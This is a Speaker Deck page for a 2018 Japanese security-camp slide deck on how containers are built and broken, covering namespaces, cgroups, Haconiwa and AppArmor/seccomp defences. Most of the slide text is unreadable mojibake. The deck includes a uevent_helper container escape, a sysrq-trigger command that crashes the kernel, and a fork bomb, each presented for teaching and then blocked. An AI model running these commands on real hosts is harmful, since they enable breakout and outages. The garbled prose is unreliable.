Upgrade to Pro — share decks privately, control downloads, hide ads and more …

コンテナの作り方、壊し方 / Container Structure and Exploitation Method

mrtc0
November 10, 2018
Programming
21
22k

コンテナの作り方、壊し方 / Container Structure and Exploitation Method

セキュリティ・ミニキャンプ2018 in 愛媛での資料です。 #seccamp

mrtc0

November 10, 2018
Tweet

More Decks by mrtc0

See All by mrtc0
コードで理解する eBPF セキュリティモニタリング
mrtc0
1
52
Product Security Casual Talk #1 - Datadog を使ったセキュリティモニタリングと 自動化の取り組み
mrtc0
1
380
GMO ペパボ株式会社 23卒・24卒向け セキュリティ勉強会 実践 DevSecOps パイプライン
mrtc0
1
420
実践 DevSecOps パイプライン ~システム開発へのセキュリティの取り入れ方~
mrtc0
2
340
脅威モデリングで考える Kubernetes セキュリティ / CloudNative Days Tokyo 2021 #CNDT2021 #CNDT2021_B
mrtc0
7
2.4k
ProSec-IT 2021 Container Security
mrtc0
2
580
GMO Developer Day 2021 - DevSecOps 推進の取り組みの紹介.pdf
mrtc0
4
1.4k
Web セキュリティ研修 / GMO ペパボ 新卒研修 2021
mrtc0
7
43k
実践コンテナ & Kubernetes セキュリティ
mrtc0
12
3.7k

Other Decks in Programming

See All in Programming
初心者のためのRubyKaigi入門/RubyKaigi Introduction
a_matsuda
8
1.3k
"config" ってなんだ? / What is "config"?
okashoi
0
250
TCAとKMPを用いた新規動画配信アプリ 「ABEMA Live」の設計
tomu28
2
120
ゆるい個人開発のススメ
kuroppe1819
10
1k
Fragment Composition of GraphQL
quramy
13
1.4k
Sheets API使ってみた
toshi0383
2
150
Ruby GitHub Packages
bkuhlmann
0
630
障害対応を起点としたもっといい開発と運用のサイクル作りのためにできること / Hatena Enginner Seminar #29
polamjag
0
310
『Railsオワコン』と言われる時代に、なぜブルーモ証券はRailsを選ぶのか
free_world21
1
330
冗長なエラーログを削減し、スタックトレースを手に入れる / Reducing Verbose Error Logs and Obtaining Stack Traces
upamune
0
950
Build Apps for iOS, Android & Desktop in 100% Kotlin With Compose Multiplatform (mDevCamp 2024)
zsmb
0
420
Amazon SQSコンシューマー疎結合への旅 - 出張! #DevelopersIO IT技術ブログの中の人が語る勉強会 #3
quiver
0
300

Featured

See All Featured
Documentation Writing (for coders)
carmenintech
61
4k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
How GitHub Uses GitHub to Build GitHub
holman
468
290k
Done Done
chrislema
178
15k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
126
32k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
20
1.7k
4 Signs Your Business is Dying
shpigford
176
21k
Code Reviewing Like a Champion
maltzj
515
39k
Designing for Performance
lara
602
67k
Automating Front-end Workflow
addyosmani
1357
200k
Adopting Sorbet at Scale
ufuk
69
8.6k
What's new in Ruby 2.0
geeforr
337
31k

Transcript

  1. ίϯςφͷ࡞Γํɺյ͠ํ ίϯςφͷηΩϡϦςΟΛ஌Ζ͏ ৿ాߒฏ !NSUD (.01FQBCP *OD ηΩϡϦςΟɾϛχΩϟϯϓJOѪඤ

  2. (.0ϖύϘηΩϡϦςΟରࡦࣨ ৿ాߒฏ!NSUD ,PIFJ.PSJUB IUUQTCMPHTTSGJO

  3. ೥ʹηΩϡϦςΟΩϟϯϓશࠃେձʹࢀՃ ೥ΑΓ4&$$0/#FHJOOFSTߨࢣ େֶࡏֶத͸ΠΤϥΤηΩϡϦςΟʹͯ8FC੬ऑੑ਍அʢΞϧόΠτʣ ೥౓*1"ະ౿ΫϦΤΠλʔ ೥ʹ(.0ϖύϘגࣜձࣾʹೖࣾ

  4. TFDDBNQ

  5. ͸͡Ίʹ wຊεϥΠυ͸ʮ۝भηΩϡϦςΟΧϯϑΝϨϯεʯͰಉ྅ͷۙ౻Ӊஐ࿕͞Μ @udzura ͱൃදͨ͠಺༰ΛҰ෦վมͨ͠΋ͷͰ͋Δ wʮίϯςφͷηΩϡϦςΟΛத਎͔Βཧղ͠Α͏ʯ wIUUQTTQFBLFSEFDLDPNVE[VSBJOTJEFPVUDPOUBJOFSBOEJUTTFDVSJUZ wεϥΠυͷར༻ͷڐՄΛ௖͖ɺҰ෦վม͍ͯ͠·͢ wշ୚௖͍ͨ!VE[VSB͞Μʹײँ͍ͨ͠·͢

  6. ͸͡Ίʹ wԋशϝΠϯͳͷͰɺࠔͬͨΒۙ͘ͷਓɺνϡʔλʔ͞ΜΛཔΓ·͠ΐ͏ wίϚϯυ͕ࣦഊ͢Δɺૢ࡞͕Θ͔Βͳ͍ͳͲ͸ɺͲΜͲΜฉ͍͍ͯͩ͘͞ wνʔτγʔτΛ༻ҙ͍ͯ͠ΔͷͰ͝׆༻͍ͩ͘͞ wάϧʔϓͷਓͱ࿩͠ͳ͕ΒਐΊͯ0,Ͱ͢ wੵۃతʹձ࿩͍ͯͩ͘͠͞ʂ

  7. "HFOEB ίϯςφԾ૝Խͱ͸ʁ ίϯςφͷ࢓૊ΈΛͷ͍ͧͯΈΑ͏ ίϯςφΛ࡞ͬͯΈΑ͏ ίϯςφͷηΩϡϦςΟϞσϧͱ"UUBDL4VSGBDFT ίϯςφΛյͦ͏

  8. ࠓ೔ͷΰʔϧ ίϯςφͷ࢓૊ΈΛͬ͘͟Γཧղ͠Α͏ ίϯςφͷηΩϡϦςΟػߏΛ஌Ζ͏ εΠʔενʔζϞσϧΛମݧ͠Α͏

  9. ίϯςφԾ૝Խͱ͸ʁ

  10. ࣍ͷιϑτ΢ΣΞΛ ࢖ͬͨ͜ͱ͕͋Δํʁ

  11. None
  12. None
  13. None

  14. Ծ૝Խ 7JSUVBMJ[BUJPO

  15. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ

  16. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ

  17. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏

  18. ίϯςφ͸Ͳ͜Ͱ࢖ΘΕ͍ͯΔ͔

  19. ίϯςφ͕ͲͷΑ͏ʹ࢖ΘΕ͍ͯΔ͔ IUUQTFOXJLJQFEJBPSHXJLJ,VCFSOFUFT

  20. ίϯςφͷηΩϡϦςΟ  ίϯςφϥϯλΠϜࣗମͷ࣮૷  ίϯςφͷηΩϡϦςΟϙϦγʔ  ίϯςφͷωοτϫʔΫ  ΦʔέετϨʔγϣϯϚωʔδυαʔϏε

  21. ίϯςφͷ࣮૷

  22. -9$ )"$0/*8" SLU

  23. ίϯςφͷϝϦοτ QSPT

  24. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

  25. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ Ϋϥ΢υʹ޲͍͍ͯΔ ΞϓϦέʔγϣϯΛؙ͝ͱίϯςφԽɺߴ଎ͳσϓϩΠɺ։ൃ

  26. ίϯςφͷσϝϦοτ DPOT

  27. ݖݶ෼཭ Ϧιʔεޮ཰ ϋΠύʔόΠβܕ ιϑτ΢ΣΞܕ ίϯςφܕ ݖݶ෼཭͕ऑ͍

  28. ίϯςφͷத਎Λͷ͍ͧͯΈΑ͏ IUUQTqJDLSQBB,5I

  29. ίϯςφ͸Ͳ͏΍ͬͯ ίϯςφʹͳ͍ͬͯΔͷ͔ʁ

  30. ࣍ͷը໘Λݟͨ͜ͱ͕͋Δํʁ

  31. None
  32. None

  33. ϓϩηε 1SPDFTT

  34. ίϯςφ͸ϓϩηε

  35. $ ./a.out BPVU -JOVYΧʔωϧ ϥΠϒϥϦ γεςϜίʔϧ

  36. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out

  37. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out

  38. $ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) execve(“/bin/cat”,

    …)

  39. $ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) ಛघͳॲཧ

  40. ίϯςφ͸ ಛघͳ ϓϩηε

  41. ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

  42. ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

    -JOVY /BNFTQBDF DHSPVQT

  43. ʮίϯςφ͸ϓϩηεͰ͋Δʯ ͜ͱΛ֬ೝ

  44. %PDLFSίϯςφͷىಈ $ docker ps -a CONTAINER ID IMAGE COMMAND 4521880cffa8

    minicamp-1 "/usr/sbin/apache2ct…" $ docker start 4521 $ curl localhost:8080 -s | grep '<title>' <title>Apache2 Ubuntu Default Page: It works</title>

  45. ϓϩηεπϦʔΛ֬ೝ $ ps auxf $ sudo apt-get install apache2 &&

    sudo systemctl start apache2  %PDLFS͕࡞ΔϓϩηεπϦʔΛݟΑ͏  ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈͯϓϩηεπϦʔΛݟΑ͏

  46. -JOVY/BNFTQBDF

  47. -JOVY/BNFTQBDFΛ֬ೝ͢Δ $ docker ps CONTAINER ID IMAGE COMMAND 4521880cffa8 minicamp-1

    “/usr/sbin/apache2ct…" $ docker exec -ti 45 bash # ίϯςφʹʮΞλονʯ͢Δ # ip a # ίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ # exit # ίϯςφ͔Βൈ͚ͯ $ ip a # ϗετͷωοτϫʔΫͱൺֱ͢Δ

  48. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever

  49. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever ίϯςφ͸ಉ͡Ϛγϯʹ͋Δϓϩηε ʹ΋͔͔ΘΒͣɺಠཱͨ͠ωοτϫʔΫ͕౰͍ͨͬͯΔ

  50. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ $ docker exec -ti 45 hostname 4521880cffa8 $ hostname

    ubuntu-xenial w ϗετ໊΋ҟͳ͍ͬͯΔ͜ͱΛ֬ೝͯ͠ΈΑ͏

  51. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ w ϓϩηεʹ͸ϓϩηε*% 1*% ͕͋Δ͕ɺͦͷ࠾൪͕ʮಠཱʯ͍ͯ͠Δ w ಉ͡1*%ʹҧ͏ϓϩηεׂ͕Γ౰ͯΒΕ͍ͯΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec

    -ti 45 ps auxf $ ps auxf

  52. Πϝʔδ host-1 192.168.1.1/24 container-1 172.16.1.1/24 container-2 10.1.1.1/24 ϗετ04 -JOVY ίϯςφ

    ίϯςφ w ʮϓϩηεΛ෼཭ʯ͍ͯ͠Δɻ04ͷػೳ͸ϗετͱڞ༗ɻ

  53. /BNFTQBDF͸ Ͳ͜Ͱ֬ೝ͢Δʁ

  54. /BNFTQBDFΛݟΔ $ ps auxf | grep -A 10 docker[d] ϗετ͔Βݟͨίϯςφͷ"QBDIFͷ1*%Λ֬ೝ͠Α͏

    $ sudo ls -l /proc/$PID/ns ҎԼͷσΟϨΫτϦΛௐ΂Δ $ sudo ls -l /proc/self/ns ϗετͷํ͸Ͳ͏ͳͷ͔ௐ΂ͯ໨EJ⒎͠Α͏

  55. $ sudo ls -l /proc/3625/ns total 0 lrwxrwxrwx 1 root

    root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276] lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274] lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279] lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275] $ sudo ls -l /proc/self/ns total 0 lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839] lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840] lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957] lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838] ໨EJ⒎͠Α͏

  56. &OUFSUIF/BNFTQBDF w ωοτϫʔΫۭؒͷΈʹΞλονͯ͠ΈΑ͏ JQBͷ݁Ռ͸%PDLFSϗετͱൺ΂ͯͲ͏ʁ IPTUOBNFͷ࣮ߦ݁Ռ͸ʁ $ sudo nsenter --net -t

    $PID $ sudo nsenter --uts -t $PID

  57. -JOVY/BNFTQBDF ໊લۭؒ ֓ཁ 1*%໊લۭؒ 1*%ͷ෼཭ Ϛ΢ϯτ໊લۭؒ ϑΝΠϧγεςϜπϦʔͷ෼཭ *1$໊લۭؒ *1$ͷ෼཭ ωοτϫʔΫ໊લۭؒ

    ωοτϫʔΫΠϯλʔϑΣΠεͷ෼཭ 654໊લۭؒ ϗετ໊ͷ෼཭ Ϣʔβʔ໊લۭؒ 6*%(*%ͷ෼཭

  58. DHSPVQ

  59. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

  60. ίϯςφͷϝϞϦׂΓ౰ͯΛ֬ೝ ϝϞϦͷׂ౰Λ֬ೝ͠Α͏ $ CID=$(docker inspect -f '{{.ID}}' 45) $ sudo

    cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes ׂ౰ͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏ $ CID2=$(docker run --memory=8m -d minicamp-1); $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

  61. ൺֱ͠Α͏ ੍ݶͷ༗ແͰίϯςφͷॲཧ଎౓͕ҟͳΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti $CID bash $ docker

    exec -ti $CID2 bash wBQUHFUVQEBUFΛ࣮ߦͯ͠ΈΑ͏ ௚઀ϝϞϦ࢖༻ྔΛมߋͯ͠ڍಈ͕վળ͢Δ͜ͱΛ֬ೝ͠Α͏ $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes $ docker exec -ti $CID2 bash root@d6a2825b878a:/# apt-get update

  62. DHSPVQTͰ੍ޚͰ͖Δ΋ͷ w $16 w ϝϞϦ w σΟεΫ*0ͷଳҬ w ϓϩηε਺ w

    FUDʜ

  63. ίϯςφΛ࡞ͬͯΈΑ͏ IUUQTqJDLSQBQH/#

  64. )BDPOJXB w @udzura (.0ϖύϘ ΒʹΑͬͯ։ൃ͞Εͨ-JOVYίϯςφϥϯλΠϜ w NSVCZͰઃఆ΍ϑοΫΛهड़Ͱ͖Δͷ͕ಛ௃ w IUUQTHJUIVCDPNIBDPOJXBIBDPOJXB $

    haconiwa version haconiwa: v0.9.5

  65. Πϝʔδ SPPUGT Λ࡞Δ $ mkdir /tmp/minicamp $ docker export 45

    | sudo tar -xv -f - -C /tmp/minicamp/ $ ls /tmp/minicamp/ bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  66. ઃఆϑΝΠϧΛੜ੒ $ haconiwa init first-container.haco assign new haconiwa name =

    haconiwa-4ad5ea68 assign rootfs location = /var/lib/haconiwa/4ad5ea68 create first-container.haco

  67. ઃఆΛมߋ # -*- mode: ruby -*- Haconiwa.define do |config| #

    The container name and container's hostname: config.name = "haconiwa-4ad5ea68" # The first process when invoking haconiwa run: config.init_command = "/bin/bash" # If your first process is a daemon, please explicitly daemonize by: # config.daemonize! . . . # The rootfs location on your host OS # Pathname class is useful: root = Pathname.new(“/tmp/minicamp”) config.chroot_to root

  68. ίϯςφΛىಈ $ haconiwa run first-container.haco Create lock: #<Lockfile path=/var/lock/.haconiwa-4ad5ea68.hacolock> Container

    fork success and going to wait: pid=6855 groups: cannot find name for group ID 1000 root@haconiwa-4ad5ea68:/# ps ax PID TTY STAT TIME COMMAND 1 pts/3 S 0:00 /bin/bash 8 pts/3 R+ 0:00 ps ax

  69. εΫϥονͰ࡞Ζ͏

  70. ·ͣ͸GPSLFYFDWFDISPPU͚ͩͰ pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve

    ENV, "/bin/bash" end p(Process.waitpid2 pid) $ hacorb test.rb bash-4.3$ pwd / bash-4.3$ ls bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  71. 1*%໊લۭؒΛ෼཭ Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/"

    Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb bash-4.3$ mount -t proc proc /proc bash-4.3$ ps aux

  72. DHSPVQΛઃఆ limit = “3" Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.mkdir

    "/sys/fs/cgroup/pids/minicamp" rescue nil system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max" system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks" Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb # ( echo 'test' | cat ) # bomb () { bomb | bomb & }; bomb

  73. ͜͜·Ͱͷ·ͱΊ w ίϯςφ͸ϗετ͔ΒݟΔͱ୯ͳΔϓϩηεͰ͋Δ w -JOVY͕࣋ͭίϯςφԽͷػೳΛ૊Έ߹Θ͍ͤͯΔ w ϓϩηεͷಠཱੑΛߴΊΔ /BNFTQBDF  w

    ϦιʔεΛׂΓ͋ͯΔʢDHSPVQ  w ͦΕҎ֎΋͋ΔΑ

  74. ෼΄Ͳٳܜ IUUQTqJDLSQQU,O/

  75. ίϯςφͷηΩϡϦςΟϞσϧͱ "UUBDL4VSGBDFT IUUQTqJDLSQB)9

  76. ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ

  77. ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ w "QQ"SNPS w TFDDPNQ w

    ಛఆͷϑΝΠϧͷύʔϛογϣϯΛམͱ͢

  78. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏

  79. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ

  80. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ Χʔωϧͷ੬ऑੑΛಥ͘

  81. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ☠ ίϯςφͷઃఆෆඋΛಥ͘ FHEPDLFSŠQSJWJMFHFE

  82. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘

  83. "UUBDL4VSGBDFT ,FSOFM 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘ $POUBJOFS $POUBJOFS $POUBJOFS

  84. εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ

  85. ίϯςφΛյͦ͏

  86. $POUBJOFS4FDVSJUZ 04Ϧιʔεͷ෼཭ 1SPDFTT pMFTZTUFN FUDʜ wDISPPUQJWPU@SPPU w-JOVY/BNFTQBDF wTFDDPNQ w-JOVY$BQBCJMJUZ wDHSPVQT

    w4&-JOVY"QQ"SNPS ݖݶػೳͷ੍ݶ QFSNJTTJPO TZTDBMM 04Ϧιʔεͷ੍ݶ $16 .FNPSZ ΞΫηείϯτϩʔϧ ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ

  87. "QQ"SNPS

  88. "QQ"SNPS wίϯςφ͸ϗετͱҰ෦ͷϑΝΠϧΛڞ༗͍ͯ͠Δ wಡΈॻ͖͕Ͱ͖ΔͱϗετʹӨڹΛٴ΅͢ϑΝΠϧ΋͋Δ wFY /proc/kcore /proc/sysrq-trigger w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSͰ੍ޚ͍ͯ͠Δ w΋͠ॻ͖ࠐΊͨ৔߹ʹͲͷΑ͏ͳ͜ͱ͕ى͜Δͷ͔͔֬ΊͯΈΑ͏ʂ

  89. /sys/kernel/uevent_helper wuevent͸σόΠε͕௥Ճ࡟আ͞Εͨͱ͖ʹΧʔωϧ͕ૹ৴͢ΔΠϕϯτ wuevent͕ૹ৴͞Εͨͱ͖ʹɺuevent_helperʹॻ͖ࠐ·Ε͍ͯΔύεͷϓ ϩάϥϜΛ࣮ߦ͢Δ wuevent͸Ϣʔβʔϥϯυ͔Βૹ৴Մೳ •/sys/devices/virtual/mem/null/uevent •/sys/class/mem/null/uevent

  90. ίϯςφΛىಈͯ͠ઃఆ $ haconiwa start sample1.haco root@sample:/# echo “export PATH=$PATH” >>

    /root/.bashrc root@sample:/# bash root@sample:/# apt-get install gcc

  91. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ haconiwa start sample1.haco root@sample:/# cat /root/hello.sh # ޷͖ͳΤσΟλͰॻ͖ࠐΉ

    #!/bin/sh echo “Hello, Host! ;)” > /tmp/hello.txt root@sample:/# chmod +x /root/hello.sh root@sample:/# echo “/var/lib/haconiwa/sample/root/hello.sh” > /sys/kernel/uevent_helper

  92. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ ls /tmp/ root@sample:/# echo change > /sys/class/mem/null/uevent $

    ls /tmp hello.txt $ cat /tmp/hello.txt hello host! ;)

  93. QSPDTZTSRUSJHHFS root@sample1:/# echo c > /proc/sysrq-trigger w/proc/sysrq-triggerʹಛఆͷจࣈྻΛૹ৴͢Δ͜ͱͰϗετΛ࠶ىಈ͞ ͤͨΓΧʔωϧύχοΫΛىͨ͜͠ΓͰ͖Δ

  94. "QQ"SNPS deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$ Λߦ͏

    wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢ wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE IUNM

  95. ๷͍ͰΈΑ͏ $ cat apparmor/haconiwa-test … deny /usr/bin/top mrwklx, deny @{PROC}/sysrq-trigger

    rwklx, … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

  96. ๷͍ͰΈΑ͏ $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/ $ sudo apparmor_parser -Kr

    \ /etc/apparmor.d/haconiwa/haconiwa-test $ cat sample1.haco … config.apparmor = "haconiwa-test" … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

  97. ๷͍ͰΈΑ͏ $ haconiwa start sample1.haco root@sample1:/# top bash: /usr/bin/top: Permission

    denied root@sample1:/# echo c > /proc/sysrq-trigger bash: /proc/sysrq-trigger: Permission denied

  98. "QQ"SNPSʹΑΔอޢ w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSʹΑͬͯίϯςφͰར༻Ͱ͖Δί Ϛϯυͷ࣮ߦ΍ϑΝΠϧ΁ͷಡΈॻ͖Λ੍ݶͰ͖Δ •/proc/sysrq-trigger •/proc/sys/kernel/core_pattern •/proc/sys/kernel/modprobe •/sys/kernel/uevent_helper

  99. TFDDPNQ

  100. TFDDPNQ wγεςϜίʔϧͷϑΟϧλϦϯάΛߦ͏࢓૊Έ wϗετଆʹΤεέʔϓΛڐͯ͠͠·͏Α͏ͳةݥͳγεςϜίʔϧΛ๷͙ root@sample1:/# mkdir /tmp/hoge Bad system call

  101. TFDDPNQΛମݧ͠Α͏ $ cat sample2.haco config.seccomp.filter(default: :allow) do |rule| rule.kill :mkdir

    # mkdir(2) Λېࢭ end $ sudo haconiwa start sample2.haco root@sample1:/# mkdir /tmp/hoge Bad system call

  102. TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ

    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘ ېࢭ͞Ε͍ͯΔγεςϜίʔϧ

